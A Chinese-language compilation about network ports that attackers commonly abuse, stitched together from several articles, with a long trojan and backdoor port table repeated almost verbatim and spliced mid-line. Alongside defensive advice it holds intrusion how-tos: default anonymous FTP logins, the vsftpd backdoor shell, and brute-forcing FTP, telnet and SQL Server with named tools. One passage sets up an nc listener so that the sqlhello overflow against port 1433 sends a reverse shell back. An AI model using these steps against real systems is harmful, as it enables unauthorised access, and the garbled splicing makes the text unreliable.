常被黑客利用端口说明

网络安全常见漏洞类型大全在当今数字化时代，网络安全问题日益严重，各种恶意攻击和黑客行为不时出现。

为了保护个人信息和重要数据的安全，我们需要了解和防范常见的网络安全漏洞。

本文将介绍一些常见的网络安全漏洞类型，以提高大家对网络安全的认识和预防能力。

一、密码安全漏洞密码安全漏洞是最常见的一种网络安全问题。

例如，用户使用弱密码、重复使用密码、密码未及时更改等，都可能导致恶意攻击者轻易获取登录凭证。

此外，密码被明文存储或不当保护也会带来密码泄露的风险。

为了有效防范密码安全漏洞，用户应该选择强密码，并定期更换密码，同时网站和应用程序也需要采取安全措施来保护用户密码。

二、漏洞利用攻击漏洞利用攻击是黑客最常用的入侵手段之一。

黑客通过寻找服务器、应用程序或操作系统中存在的漏洞，利用这些漏洞获取非授权访问权限。

常见的漏洞包括软件安全补丁缺失、未授权访问、缓冲区溢出和跨站点脚本（XSS）等。

为了防范漏洞利用攻击，组织和个人应该定期更新软件和应用程序，关闭不必要的服务和端口，并加强网络入侵检测和防御措施。

三、拒绝服务攻击拒绝服务攻击（Denial of Service，DoS）旨在通过消耗系统资源或使系统崩溃，从而使合法用户无法正常访问网络服务。

常见的DoS攻击包括UDP洪水攻击、SYN洪水攻击和HTTP POST攻击等。

为了防范拒绝服务攻击，组织和个人应该部署有效的DoS防御措施，例如使用入侵预防系统（IPS）和流量过滤器。

四、恶意软件恶意软件是指意图非法获取用户信息或损害系统安全的恶意程序。

常见的恶意软件包括计算机病毒、蠕虫、特洛伊木马、广告软件和间谍软件等。

为了防范恶意软件的侵害，用户应该安装可信的杀毒软件，并及时更新病毒库。

此外，用户不应轻易点击未知链接或下载来历不明的文件，以免感染恶意软件。

五、社交工程攻击社交工程攻击是一种通过欺骗、欺诈和误导等手段获取用户敏感信息的攻击方式。

常见的社交工程攻击包括钓鱼攻击、假冒网站和欺诈邮件等。

可能存在安全威胁的端口及操作建议1、21端口：端口说明：21端口主要用于FTP（File Transfer Protocol，文件传输协议）服务。

操作建议：因为有的FTP服务器可以通过匿名登录，所以常常会被黑客利用。

另外，21端口还会被一些木马利用，比如Blade Runner、FTP Trojan、Doly Trojan、WebEx等等。

如果不架设FTP服务器，建议关闭21端口。

2、23端口端口说明：23端口主要用于Telnet（远程登录）服务。

操作建议：利用Telnet服务，黑客可以搜索远程登录Unix的服务，扫描操作系统的类型。

而且在Windows 2000中Telnet服务存在多个严重的漏洞，比如提升权限、拒绝服务等，可以让远程服务器崩溃。

Telnet服务的23端口也是TTS（Tiny Telnet Server）木马的缺省端口。

所以，建议关闭23端口。

3、53端口端口说明：53端口为DNS（Domain Name Server，域名服务器）服务器所开放，主要用于域名解析。

端口漏洞：如果开放DNS服务，黑客可以通过分析DNS服务器而直接获取Web服务器等主机的IP地址，再利用53端口突破某些不稳定的防火墙，从而实施攻击。

近日，美国一家公司也公布了10个最易遭黑客攻击的漏洞，其中第一位的就是DNS服务器的BIND漏洞。

操作建议：如果当前的计算机不是用于提供域名解析服务，建议关闭该端口。

4、80端口端口说明：80端口是为HTTP（HyperText Transport Protocol，超文本传输协议）开放的。

端口漏洞：有些木马程序可以利用80端口来攻击计算机的，比如Executor、RingZero 等。

操作建议：为了能正常上网冲浪，我们必须开启80端口。

5、139端口端口说明：139端口是为“NetBIOS Session Service”提供的，主要用于提供Windows文件和打印机共享以及Unix中的Samba服务。

常⽤的端⼝攻击端⼝渗透总结0x00 背景端⼝渗透过程中我们需要关注⼏个问题：1、端⼝的banner信息2、端⼝上运⾏的服务3、常见应⽤的默认端⼝当然对于上⾯这些信息的获取，我们有各式各样的⽅法，最为常见的应该就是nmap了吧！我们也可以结合其他的端⼝扫描⼯具，⽐如专门的3389、1433等等的端⼝扫描⼯具；服务默认端⼝公认端⼝(Well Known Ports)：0-1023，他们紧密绑定了⼀些服务；注册端⼝(Registered Ports)：1024-49151，他们松散的绑定了⼀些服务；动态/私有：49152-65535，不为服务分配这些端⼝；当然这些端⼝都可以通过修改来达到欺骗攻击者的⽬的，但是这就安全了吗？攻击者⼜可以使⽤什么攻击⽅式来攻击这些端⼝呢？还需要注明的⼀点是：很多⽊马⼯具也有特定的端⼝，本⽂并没有涉及到这块的内容，⼤家可以⾃⼰去收集收集！关于爆破之我见在对这些端⼝进⾏实战讲解时，我需要先阐述⼀下我对爆破这个⽅式的⼀些看法；爆破：技术最简单，需要的技术能⼒基本为0，⼯作效率与⽹络、硬件等相关，在我看来爆破其实是最强⼤的攻击⽅式，特别是结合⼀些特制的字典，结合社⼯我们可以在很短的时间达到最⼤的效果，只不过因为我们的pc或者字典不够强⼤，所以很多时候我们不能进⾏⼀次优秀的爆破攻击；当然现在很多web应⽤以及服务端⼝都限制了暴⼒破解；对于这种做了限制的我们可能就需要利⽤到本⽂提到的其他攻击了！分享⼀个团队sai总结的字典：声明：本⽂总结的都是近两年的常见漏洞，以前的⽼版漏洞以及危害性不⼤的漏洞没有总结，望⼤家谅解！0x01 实战测试⽂件共享服务端⼝渗透ftp服务FTP服务：ftp服务我分为两种情况，第⼀种是使⽤系统软件来配置，⽐如IIS中的FTP⽂件共享或Linux中的默认服务软件；第⼆种是通过第三⽅软件来配置，⽐如Serv-U还有⼀些⽹上写的简易ftp服务器等；默认端⼝：20（数据端⼝）；21（控制端⼝）；69（tftp⼩型⽂件传输协议）攻击⽅式：爆破：ftp的爆破⼯具有很多，这⾥我推荐owasp的以及msf中ftp爆破模块；匿名访问：⽤户名：anonymous 密码：为空或任意邮箱⽤户名：FTP 密码：FTP或为空⽤户名：USET 密码：pass当然还有不需要⽤户名密码直接访问的，⼀般出现在局域⽹中；嗅探：ftp使⽤明⽂传输技术（但是嗅探给予局域⽹并需要欺骗或监听⽹关）后门技术：在linux的vsftp某⼀版本中，存在着⼀个后门程序，只要在⽤户名后⾯加上就会在6200上打开⼀个监听Shell，我们可以使⽤telnet直接连接；详细远程溢出漏洞：6.10.1 IIS FTP远程溢出漏洞，在IIS FTP服务器中NLST命令存在⼀个缓冲区溢出漏洞，这个漏洞可能是攻击者在服务器运⾏⼀条⾮法命令。

各种病毒常用端口872 TCP i 黑客TCP入口9873 TCP i 黑客TCP入口9874 TCP i 黑客TC各种病毒常用端口872 TCP i 黑客TCP入口9873 TCP i 黑客TCP入口9874 TCP i 黑客TCP入口9875 TCP i 黑客TCP入口9898 i 假警察（Worm.Win32.Dabber.a）9996 TCP i 震荡波（Worm.Sasser.b）、高波9999 TCP i BackDoor10000 TCP i BackDoor10001 i BackDoor10002 TCP i 病毒下载器10066 i Ambush Trojan10067 TCP i 黑客TCP入口10067 UDP i 黑客UDP入口10080 o SCO炸弹（MyDoom）10100 UDP i BackDoor10167 TCP i 黑客TCP入口10167 UDP i 黑客UDP入口10168 i 恶邮差10607 TCP i COMA Trojan（特征码：434f4d4120536572766572）10888 TCP i BackDoor11240 TCP i BackDoor11927 i Win32.Randin12121 TCP i BackDoor12223 TCP i Hack 99 Keylogger Trojan12345 i NetBus 1.x12346 i NetBus 1.x12361~12363 i Whack-a-Mole13010 TCP i 黑客TCP入口14500~14503 TCP i PC Invader15210 UDP i BackDoor15368 i BackDoor15804 i 病毒下载器15849 TCP i BackDoor16660 TCP i Stacheldraht (DDoS)16661 TCP i BackDoor16772 TCP i ICQ Revenge Trojan17300 TCP i Kuang2病毒17428 TCP i BackDoor17569 TCP i Infector 1.4.x/1.6.x17593 TCP i Audiodoor Trojan18735 TCP i Shaft (DDoS)18961 TCP i BackDoor19191 i 蓝色火焰19864 TCP i ICQ Revenge Trojan20000 TCP i GirlFriend20001 TCP i GirlFriend20002 TCP i AcidkoR Trojan20023 TCP i VP Killer Trojan20034 i NetBus Pro20168 i/o lovgate蠕虫20432 TCP i Shaft (DDoS)20808 TCP i/o QQ女友(Worm.LovGate.v.QQ)21544 TCP i GirlFriend21554 TCP i GirlFriend22179 i BackDoor22180 i BackDoor22181 i BackDoor22226 TCP i 高波22784 TCP i BackDoor22899 TCP i 病毒下载器23444 TCP i 网络公牛23456 i Evil FTP、Ugly FTP25836 i Trojan.Proxy26034 i BackDoor26097 i BackDoor26374 UDP i Sub-726573 UDP i Sub-727117 i BackDoor27184 UDP i Alvgus 2000 Trojan27374 TCP i Sub-7木马、BackDoor、东方魔眼、Baste Trojan28882 TCP i Trojan.Mitglieder28883 TCP i Trojan.Mitglieder29431 TCP i 黑客TCP入口29432 TCP i 黑客TCP入口29785 i BackDoor29786 i BackDoor29787 i BackDoor29788 i BackDoor30029 TCP i AOL trojan30100 TCP i/o NetSphere30108 TCP i BackDoor30999 TCP i Kuang病毒30100~30103 TCP i NetSphere30133 TCP i NetSphere31000 i Win32.HLLC.Setex（木马程序）31320 i BackDoor31335 UDP i Trin00 DoS Attack31337 TCP i Back Orifice、Netspy31337 i BackDoor31338 UDP i Back Orifice、DeepBO、NetSpy31339 i NetSpy31375 TCP i BackDoor31666 i Back Orifice31778 TCP i 黑客TCP入口31785 TCP i 黑客TCP入口31787 TCP i 黑客TCP入口31789 TCP i 黑客TCP入口31789 UDP i/o Hack-a-tack控制连接31791 TCP i 黑客TCP入口31792 TCP i 黑客TCP入口31785~31792 i Hack-a-tack（特征代码：486154）32440 TCP i BackDoor32770~32900 i RPC服务扫描（寻找可被攻击的已知的RPC 服务）33333 TCP i Blakharaz Trojan34555 TCP i Trin00 (Windows) (DDoS)35555 TCP i Trin00 (Windows) (DDoS)36010 TCP i Winser36183 TCP i BackDoor36549 i Trojan.Proxy37264 TCP i/o Winser40404 TCP i Backdoor.Spybot.bo（偷用户正版游戏的序列号）40421~40426 i Masters Paradise41337 TCP i Storm41417 i 病毒下载器41666 i Remote Boot Tool Trojan43210 i Schoolbus43958 TCP i BackDoor44767 i Schoolbus45576 i 代理软件的控制端口45672 TCP i BackDoor46147 i Backdoor.SdBot47878 i BirdSPY249301 TCP i OnLine KeyLogger Trojan50305 i BackDoor50505 i ICQTrojan52013 i BackDoor53001 TCP i Remote Windows Shutdown Trojan 54283 i Sub-754320~54321 i Back Orifice54321 i Schoolbus54321 TCP i BackDoor58008~58009 i BackDoor59211 i BackDoor64444 TCP i BackDoor65000 TCP i Devil、DDoS65333 TCP i BackDoor65432 UDP i The Traitor65506 TCP i 混合杀手65535 TCP i RC1 TrojanP入口9875 TCP i 黑客TCP入口9898 i 假警察（Worm.Win32.Dabber.a）9996 TCP i 震荡波（Worm.Sasser.b）、高波9999 TCP i BackDoor10000 TCP i BackDoor10001 i BackDoor10002 TCP i 病毒下载器10066 i Ambush Trojan10067 TCP i 黑客TCP入口10067 UDP i 黑客UDP入口10080 o SCO炸弹（MyDoom）10100 UDP i BackDoor10167 TCP i 黑客TCP入口10167 UDP i 黑客UDP入口10168 i 恶邮差10607 TCP i COMA Trojan（特征码：434f4d4120536572766572）10888 TCP i BackDoor11240 TCP i BackDoor11927 i Win32.Randin12121 TCP i BackDoor12223 TCP i Hack 99 Keylogger Trojan12345 i NetBus 1.x12346 i NetBus 1.x12361~12363 i Whack-a-Mole13010 TCP i 黑客TCP入口14500~14503 TCP i PC Invader15210 UDP i BackDoor15804 i 病毒下载器15849 TCP i BackDoor16660 TCP i Stacheldraht (DDoS)16661 TCP i BackDoor16772 TCP i ICQ Revenge Trojan17300 TCP i Kuang2病毒17428 TCP i BackDoor17569 TCP i Infector 1.4.x/1.6.x17593 TCP i Audiodoor Trojan18735 TCP i Shaft (DDoS)18961 TCP i BackDoor19191 i 蓝色火焰19864 TCP i ICQ Revenge Trojan20000 TCP i GirlFriend20001 TCP i GirlFriend20002 TCP i AcidkoR Trojan20023 TCP i VP Killer Trojan20034 i NetBus Pro20168 i/o lovgate蠕虫20432 TCP i Shaft (DDoS)20808 TCP i/o QQ女友 (Worm.LovGate.v.QQ)21544 TCP i GirlFriend21554 TCP i GirlFriend22179 i BackDoor22180 i BackDoor22181 i BackDoor22226 TCP i 高波22784 TCP i BackDoor22899 TCP i 病毒下载器23444 TCP i 网络公牛23456 i Evil FTP、Ugly FTP25836 i Trojan.Proxy26034 i BackDoor26097 i BackDoor26374 UDP i Sub-726573 UDP i Sub-727117 i BackDoor27184 UDP i Alvgus 2000 Trojan27374 TCP i Sub-7木马、BackDoor、东方魔眼、Baste Trojan 28882 TCP i Trojan.Mitglieder28883 TCP i Trojan.Mitglieder29431 TCP i 黑客TCP入口29432 TCP i 黑客TCP入口29786 i BackDoor29787 i BackDoor29788 i BackDoor30029 TCP i AOL trojan30100 TCP i/o NetSphere30108 TCP i BackDoor30999 TCP i Kuang病毒30100~30103 TCP i NetSphere30133 TCP i NetSphere31000 i Win32.HLLC.Setex（木马程序）31320 i BackDoor31335 UDP i Trin00 DoS Attack31337 TCP i Back Orifice、Netspy31337 i BackDoor31338 UDP i Back Orifice、DeepBO、NetSpy31339 i NetSpy31375 TCP i BackDoor31666 i Back Orifice31778 TCP i 黑客TCP入口31785 TCP i 黑客TCP入口31787 TCP i 黑客TCP入口31789 TCP i 黑客TCP入口31789 UDP i/o Hack-a-tack控制连接31791 TCP i 黑客TCP入口31792 TCP i 黑客TCP入口31785~31792 i Hack-a-tack（特征代码：486154）32440 TCP i BackDoor32770~32900 i RPC服务扫描（寻找可被攻击的已知的RPC服务）33333 TCP i Blakharaz Trojan34555 TCP i Trin00 (Windows) (DDoS)35555 TCP i Trin00 (Windows) (DDoS)36010 TCP i Winser36183 TCP i BackDoor36549 i Trojan.Proxy37264 TCP i/o Winser40404 TCP i Backdoor.Spybot.bo（偷用户正版游戏的序列号）40421~40426 i Masters Paradise41337 TCP i Storm41417 i 病毒下载器41666 i Remote Boot Tool Trojan43210 i Schoolbus43958 TCP i BackDoor44767 i Schoolbus45576 i 代理软件的控制端口45672 TCP i BackDoor46147 i Backdoor.SdBot47878 i BirdSPY249301 TCP i OnLine KeyLogger Trojan50305 i BackDoor50505 i ICQTrojan52013 i BackDoor53001 TCP i Remote Windows Shutdown Trojan 54283 i Sub-754320~54321 i Back Orifice54321 i Schoolbus54321 TCP i BackDoor58008~58009 i BackDoor59211 i BackDoor64444 TCP i BackDoor65000 TCP i Devil、DDoS65333 TCP i BackDoor65432 UDP i The Traitor65506 TCP i 混合杀手65535 TCP i RC1 Trojan。

计算机常用端口一览表:见端口列表tcp端口7 = 回显9 = 丢弃11 = 在线用户13 = 时间服务15 = 网络状态17 = 每日引用18 = 消息发送19 = 字符发生器20 = ftp数据21 = 文件传输22 = ssh端口23 = 远程终端25 = 发送邮件31 = masters paradise木马37 = 时间39 = 资源定位协议41 = deepthroat木马42 = wins 主机名服务43 = whois服务58 = dmsetup木马59 = 个人文件服务63 = whois端口69 = tftp服务70 = 信息检索79 = 查询在线用户80 = web网页88 = kerberros5认证101 = 主机名102 = iso107 = 远程登录终端109 = pop2邮件110 = pop3邮件111 = sun远程控制113 = 身份验证117 = uupc119 = nntp新闻组121 = jammerkillah木马135 = 本地服务138 = 隐形大盗139 = 文件共享143 = imap4邮件146 = fc-infector木马158 = 邮件服务170 = 打印服务179 = bgp194 = irc port213 = tcp over ipx220 = imap3邮件389 = 目录服务406 = imsp port411 = dc++421 = tcp wrappers443 = 安全web访问445 = smb(交换服务器消息块) 456 = hackers paradise木马464 = kerberros认证512 = 远程执行或卫星通讯513 = 远程登录与查询514 = shell/系统日志515 = 打印服务517 = talk518 = 网络聊天520 = efs525 = 时间服务526 = 日期更新530 = rpc531 = rasmin木马532 = 新闻阅读533 = 紧急广播540 = uucp543 = kerberos登录544 = 远程shell550 = who554 = rtsp555 = ini-killer木马556 = 远程文件系统560 = 远程监控561 = 监控636 = 安全目录服务666 = attack ftp木马749 = kerberos管理750 = kerberos v4911 = dark shadow木马989 = ftps990 = ftps992 = telnets993 = imaps999 = deepthroat木马1001 = silencer木马1010 = doly木马1011 = doly木马1012 = doly木马1015 = doly木马1024 = netspy木马1042 = bla木马1045 = rasmin木马1080 = socks代理1090 = extreme木马1095 = rat木马1097 = rat木马1098 = rat木马1099 = rat木马1109 = kerberos pop1167 = 私用电话1170 = psyber stream server 1214 = kazaa下载1234 = ultors/恶鹰木马1243 = backdoor/subseven木马1245 = voodoo doll木马1349 = bo dll木马1352 = lotus notes1433 = sql server1492 = ftp99cmp木马1494 = citrix1503 = netmeeting1512 = wins解析1524 = ingreslock后门1600 = shivka-burka木马1630 = 网易泡泡1701 = l2tp1720 = h3231723 = pptp(虚拟专用网)1731 = netmeeting1755 = 流媒体服务1807 = spysender木马1812 = radius认证1813 = radius评估1863 = msn聊天1981 = shockrave木马1999 = backdoor木马2000 = transscout-remote-explorer木马2001 = transscout木马2002 = transscout/恶鹰木马2003 = transscout木马2004 = transscout木马2005 = transscout木马2023 = ripper木马2049 = nfs服务器2053 = knetd2115 = bugs木马2140 = deep throat木马2401 = cvs2535 = 恶鹰2565 = striker木马2583 = wincrash木马2773 = backdoor/subseven木马2774 = subseven木马2801 = phineas phucker木马2869 = upnp(通用即插即用)3024 = wincrash木马3050 = interbase3128 = squid代理3129 = masters paradise木马3150 = deepthroat木马3306 = mysql3389 = 远程桌面3544 = msn语音3545 = msn语音3546 = msn语音3547 = msn语音3548 = msn语音3549 = msn语音3550 = msn语音3551 = msn语音3552 = msn语音3553 = msn语音3554 = msn语音3555 = msn语音3556 = msn语音3557 = msn语音3558 = msn语音3559 = msn语音3560 = msn语音3561 = msn语音3562 = msn语音3563 = msn语音3564 = msn语音3565 = msn语音3566 = msn语音3567 = msn语音3568 = msn语音3569 = msn语音3570 = msn语音3571 = msn语音3572 = msn语音3573 = msn语音3574 = msn语音3575 = msn语音3576 = msn语音3577 = msn语音3578 = msn语音3579 = msn语音3700 = portal of doom木马4080 = webadmin4081 = webadmin+ssl4092 = wincrash木马4267 = subseven木马4443 = aol msn4567 = file nail木马4590 = icq木马4661 = 电驴下载4663 = 电驴下载4664 = 电驴下载4665 = 电驴下载4666 = 电驴下载4899 = radmin木马5000 = sokets-de木马5000 = upnp(通用即插即用) 5001 = back door setup木马5060 = sip5168 = 高波蠕虫5190 = aol msn5321 = firehotcker木马5333 = netmonitor木马5400 = blade runner木马5401 = blade runner木马5402 = blade runner木马5550 = japan xtcp木马5554 = 假警察蠕虫5555 = serveme木马5556 = bo facil木马5557 = bo facil木马5569 = robo-hack木马5631 = pcanywhere5632 = pcanywhere5742 = wincrash木马5800 = vnc端口5801 = vnc端口5890 = vnc端口5891 = vnc端口5892 = vnc端口6267 = 广外女生6400 = the thing木马6665 = irc6666 = irc server port 6667 = 小邮差6668 = irc6669 = irc6670 = deepthroat木马6711 = subseven木马6771 = deepthroat木马6776 = backdoor-g木马6882 = bt下载6883 = bt下载6884 = bt下载6885 = bt下载6886 = bt下载6887 = bt下载6888 = bt下载6889 = bt下载6890 = bt下载6939 = indoctrination木马6969 = gatecrasher/priority木马6970 = gatecrasher木马7000 = remote grab木马7001 = windows messager7070 = realaudio控制口7215 = backdoor/subseven木马7300 = 网络精灵木马7301 = 网络精灵木马7306 = 网络精灵木马7307 = 网络精灵木马7308 = 网络精灵木马7424 = host control trojan7467 = padobot7511 = 聪明基因7597 = qaz木马7626 = 冰河木马7789 = back door setup/ickiller木马8011 = 无赖小子8102 = 网络神偷8181 = 灾飞9408 = 山泉木马9535 = 远程管理9872 = portal of doom木马9873 = portal of doom木马9874 = portal of doom木马9875 = portal of doom木马9898 = 假警察蠕虫9989 = ini-killer木马10066 = ambush trojan10067 = portal of doom木马10167 = portal of doom木马10168 = 恶邮差10520 = acid shivers木马10607 = coma木马11000 = senna spy木马11223 = progenic木马11927 = win32.randin12076 = gjammer木马12223 = keylogger木马12345 = netbus木马12346 = gabanbus木马12361 = whack-a-mole木马12362 = whack-a-mole木马12363 = whack-a-mole木马12631 = whackjob木马13000 = senna spy木马13223 = powwow聊天14500 = pc invader木马14501 = pc invader木马14502 = pc invader木马14503 = pc invader木马15000 = netdemon木马15382 = subzero木马16484 = mosucker木马16772 = icq revenge木马16969 = priority木马17072 = conducent广告17166 = mosaic木马17300 = kuang2 the virus trojan 17449 = kid terror trojan 17499 = crazzynet trojan17500 = crazzynet trojan17569 = infector trojan17593 = audiodoor trojan17777 = nephron trojan19191 = 蓝色火焰19864 = icq revenge木马20001 = millennium木马20002 = acidkor trojan20005 = mosucker木马20023 = vp killer trojan20034 = netbus 2 pro木马20808 = qq女友21544 = girlfriend木马22222 = proziack木马23005 = nettrash木马23006 = nettrash木马23023 = logged木马23032 = amanda木马23432 = asylum木马23444 = 网络公牛23456 = evil ftp木马23456 = evilftp-uglyftp木马23476 = donald-dick木马23477 = donald-dick木马25685 = moonpie木马25686 = moonpie木马25836 = trojan-proxy25982 = moonpie木马26274 = delta source木马27184 = alvgus 2000 trojan 29104 = nettrojan木马29891 = the unexplained木马30001 = error32木马30003 = lamers death木马30029 = aol木马30100 = netsphere木马30101 = netsphere木马30102 = netsphere木马30103 = netsphere 木马30103 = netsphere木马30133 = netsphere木马30303 = sockets de troie 30947 = intruse木马31336 = butt funnel木马31337 = back-orifice木马31338 = netspy dk 木马31339 = netspy dk 木马31666 = bowhack木马31785 = hack attack木马31787 = hack attack木马31788 = hack-a-tack木马31789 = hack attack木马31791 = hack attack木马31792 = hack-a-tack木马32100 = peanut brittle木马32418 = acid battery木马33333 = prosiak木马33577 = son of psychward木马33777 = son of psychward木马33911 = spirit 2000/2001木马34324 = big gluck木马34555 = trinoo木马35555 = trinoo木马36549 = trojan-proxy37237 = mantis trojan40412 = the spy木马40421 = agent 40421木马40422 = master-paradise木马40423 = master-paradise木马40425 = master-paradise木马40426 = master-paradise木马41337 = storm木马41666 = remote boot tool木马46147 = backdoor.sdbot47262 = delta source木马49301 = online keylogger木马50130 = enterprise木马50505 = sockets de troie木马50766 = fore木马51996 = cafeini木马53001 = remote windows shutdown木马54283 = backdoor/subseven木马54320 = back-orifice木马54321 = back-orifice木马55165 = file manager木马57341 = netraider木马58339 = butt funnel木马60000 = deepthroat木马60411 = connection木马61348 = bunker-hill木马61466 = telecommando木马61603 = bunker-hill木马63485 = bunker-hill木马65000 = devil木马65390 = eclypse木马65432 = the traitor木马65535 = rc1木马udp端口31 = masters paradise木马41 = deepthroat木马53 = 域名解析67 = 动态ip服务68 = 动态ip客户端135 = 本地服务137 = netbios名称138 = netbios dgm服务139 = 文件共享146 = fc-infector木马161 = snmp服务162 = snmp查询445 = smb(交换服务器消息块) 500 = vpn密钥协商666 = bla木马999 = deepthroat木马1027 = 灰鸽子1042 = bla木马1561 = muska52木马1900 = upnp(通用即插即用) 2140 = deep throat木马2989 = rat木马3129 = masters paradise木马3150 = deepthroat木马3700 = portal of doom木马4000 = qq聊天4006 = 灰鸽子5168 = 高波蠕虫6670 = deepthroat木马6771 = deepthroat木马6970 = readaudio音频数据8000 = qq聊天8099 = vc远程调试8225 = 灰鸽子9872 = portal of doom木马9873 = portal of doom木马9874 = portal of doom木马9875 = portal of doom木马10067 = portal of doom木马10167 = portal of doom木马22226 = 高波蠕虫26274 = delta source木马31337 = back-orifice木马31785 = hack attack木马31787 = hack attack木马31788 = hack-a-tack木马31789 = hack attack木马31791 = hack attack木马31792 = hack-a-tack木马34555 = trin00 ddos木马40422 = master-paradise木马40423 = master-paradise木马40425 = master-paradise木马40426 = master-paradise木马47262 = delta source木马54320 = back-orifice木马54321 = back-orifice木马60000 = deepthroat木马常被黑客利用端口一些端口常常会被黑客利用，还会被一些木马病毒利用，对计算机系统进行攻击，以下是计算机端口的介绍以及防止被黑客攻击的简要办法。

识别网络攻击的七大要点
识别网络攻击的迹象需要注意以下几点：
1.观察系统日志或登录日志文件：如果发现有异常的登录行为，例如时间异
常、地点异常等，可能意味着系统遭到了攻击。

2.检查系统是否打开了一些不必要的端口：黑客攻击通常会利用一些未关闭
的端口，因此如果发现一些未知的端口被打开，可能意味着系统遭到了攻击。

3.检查是否有可疑的进程在运行：如果发现一些未知的进程在运行，可能意
味着系统遭到了攻击。

4.检查是否有异常的网络流量：如果发现网络流量异常，例如突然出现了大
量的数据流量，可能意味着系统遭到了攻击。

5.关注是否有异常的错误信息：如果发现一些未知的错误信息，例如应用程
序崩溃或系统崩溃等，可能意味着系统遭到了攻击。

6.检查是否有被篡改的文件或程序：如果发现一些重要的文件或程序被篡改，
可能意味着系统遭到了攻击。

7.关注是否有异常的用户行为：如果发现一些未知的用户行为，例如异常的
登录行为、异常的交易行为等，可能意味着系统遭到了攻击。

总之，要识别网络攻击的迹象，需要密切关注系统的运行状态和网络流量等，及时发现异常情况并采取相应的措施。

常见的黑客入侵方法与防范本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法，希望能对大家有所帮助，以助于大家能更好地防御黑客的攻击，下面店铺来告诉你吧!1. 利用4899端口入侵4899端口是一个远程控制软件(remote administrator)服务端监听的端口，他不能算是一个木马程序，但是具有远程控制功能，通常杀毒软件是无法查出它来的用4899过滤器.exe，扫描空口令的机器2. 利用3899的入侵对很早的机器，可以试试3389的溢出对2000的机器，可以试试字典暴破。

3.利用1433端口入侵1433端口，是SQL Server默认的端口，SQL Server服务使用两个端口：TCP-1433、UDP-1434。

其中1433用于供SQL Server对外提供服务，1434用于向请求者返回SQL Server使用了哪个TCP/IP 端口。

scanport.exe 查有1433的机器SQLScanPass.exe 进行字典暴破(字典是关键)最后 SQLT ools.exe入侵对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口(以上反向的，测试成功)sqlhelloz.exe 入侵ip 1433 (这个是正向连接)4. 利用80端口入侵80端口是为HTTP(HyperText Transport Protocol)即超文本传输协议开放的，此为上网冲浪使用次数最多的协议，主要用于WWW(World Wide Web)即万维网传输信息的协议。

可以通过HTTP地址(即常说的“网址”)加“:80”来访问网站，因为浏览网页服务默认的端口号都是80，因此只需输入网址即可，不用输入“:80”了。

对sp3以前的机器，可以用webdav入侵;对bbs论坛，可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL进行注入。

计算机常用端口号一览/功用/详细说明浩然一方注：字体加粗的为常用端口0 Reserved通常用于分析操作系统。

“0”是无效端口1 tcpmux传输控制协议端口服务多路开关选择器，Irix是实现tcpmux的主要提供者2 compressnet 管理实用程序3 压缩进程5 远程作业登录7 回显(Echo)，作为控制批处理命令在执行时是否显示命令行自身的开关9 丢弃11 在线用户13 时间15 NETSTAT17 每日引用18 消息发送协议19 字符发生器，仅仅发送字符的服务20 文件传输协议(默认数据口)21 文件传输协议(FTP控制) 用于上传、下载，这些服务器带有可读写的目录22 SSH远程登录协议、安全登录、文件传送(SCP)和端口重定向23 telnet 终端仿真协议、不安全的文本传送、远程登录24 预留给个人用邮件系统25 SMTP简单邮件发送协议(E-mail)，SMTP服务器所开放的端口，用于发送邮件。

27 NSW 用户系统现场工程师29 MSG ICP31 MSG验证33 显示支持协议35 预留给个人打印机服务37 时间38 路由访问协议39 资源定位协议41 图形42 WINS 主机名服务43 "绰号" who is服务44 MPM(消息处理模块)标志协议45 消息处理模块46 消息处理模块(默认发送口)47 NI FTP48 数码音频后台服务49 TACACS登录主机协议50 远程邮件检查协议51 IMP(接口信息处理机)逻辑地址维护52 施乐网络服务系统时间协议53 域名服务器，防火墙常常过滤或记录此端口54 施乐网络服务系统票据交换55 ISI图形语言56 施乐网络服务系统验证57 预留个人用终端访问58 施乐网络服务系统邮件59 预留个人文件服务60 未定义61 NI邮件62 异步通讯适配器服务63 WHOIS+64 通讯接口65 TACACS数据库服务66 Oracle SQL*NET67 引导程序协议服务端68 引导程序协议客户端69 小型文件传输协议TFTP70 信息检索协议71 远程作业服务72 远程作业服务73 远程作业服务74 远程作业服务75 预留给个人拨出服务76 分布式外部对象存储77 预留给个人远程作业输入服务78 修正TCP79 Finger，获得用户信息，查询操作系统，探测已知的缓冲区溢出错误，回应从自己机器到其他机器Finger扫描80 全球信息网超文本传输协议(HTTP)，用于网页浏览81 HOST2名称服务82 传输实用程序83 模块化智能终端ML设备84 公用追踪设备85 模块化智能终端ML设备86 Micro Focus Cobol编程语言87 预留给个人终端连接88 Kerberos安全认证系统89 SU/MIT终端仿真网关90 DNSIX 安全属性标记图91 MIT Dover假脱机92 网络打印协议93 设备控制协议94 Tivoli对象调度95 SUPDUP96 DIXIE协议规范97 快速远程虚拟文件协议98 TAC(东京大学自动计算机)新闻协议101 usually from sri-nic102 iso-tsap，消息传输代理103 ISO Mail104 x400-snd105 csnet-ns109 POP3服务器开放此端口，用于接收邮件，客户端访问服务器端的邮件服务110 Pop3 服务器(邮箱发送服务器)111 portmap 或sunrpc113用于鉴别TCP连接的用户，可以获得许多计算机的信息。

常见端⼝漏洞利⽤总结23端⼝渗透剖析telnet是⼀种旧的远程管理⽅式，使⽤telnet⼯具登录系统过程中，⽹络上传输的⽤户和密码都是以明⽂⽅式传送的，⿊客可使⽤嗅探技术截获到此类密码。

（1）暴⼒破解技术是常⽤的技术，使⽤hydra,或者msf中telnet模块对其进⾏破解。

（2）在linux系统中⼀般采⽤SSH进⾏远程访问，传输的敏感数据都是经过加密的。

⽽对于windows下的telnet来说是脆弱的，因为默认没有经过任何加密就在⽹络中进⾏传输。

使⽤cain等嗅探⼯具可轻松截获远程登录密码。

25/465端⼝渗透剖析smtp：邮件协议，在linux中默认开启这个服务，可以向对⽅发送钓鱼邮件默认端⼝：25（smtp）、465（smtps）（1）爆破：弱⼝令（2）未授权访问80端⼝渗透剖析80端⼝通常提供web服务。

⽬前⿊客对80端⼝的攻击典型是采⽤SQL注⼊的攻击⽅法，脚本渗透技术也是⼀项综合性极⾼的web渗透技术，同时脚本渗透技术对80端⼝也构成严重的威胁。

